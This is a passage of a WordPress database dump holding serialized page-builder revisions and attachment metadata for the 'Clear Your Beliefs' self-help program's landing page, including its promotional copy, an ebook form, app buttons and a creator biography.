Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1048, 1550, '_wp_attached_file', '2014/10/learn-more.png'),
(1049, 1550, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:204;s:6:"height";i:54;s:4:"file";s:22:"2014/10/learn-more.png";s:5:"sizes";a:2:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"learn-more-150x54.png";s:5:"width";i:150;s:6:"height";i:54;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:21:"learn-more-170x54.png";s:5:"width";i:170;s:6:"height";i:54;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1050, 1550, '_edit_lock', '1413848878:2'),
(1052, 1552, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<p><b>What You Can Accomplish with Clear Your Beliefs</b><br /> [su_row][su_column size="1/2"]</p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li></ul><p>[/su_column]<br /> [su_column size="1/2"]</p><ul style="margin-top: -20px;"><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column]<br /> [/su_row]</p><p><b>How and Why It Works</b></p><ul><li>Beliefs are the major cause of upset and unhappiness</li><li>CYB clears beliefs at the core of the psyche, where they live</li><li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li><li>You take charge and decide what you want to believe</li><li>You’re guided gently, step-by-step, through the entire process</li><li>You decide how far to go, and what changes to make</li></ul><p>[/su_tab][/su_tabs]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1051, 1551, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1053, 1553, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1169:"<b>What You Can Accomplish with Clear Your Beliefs</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your 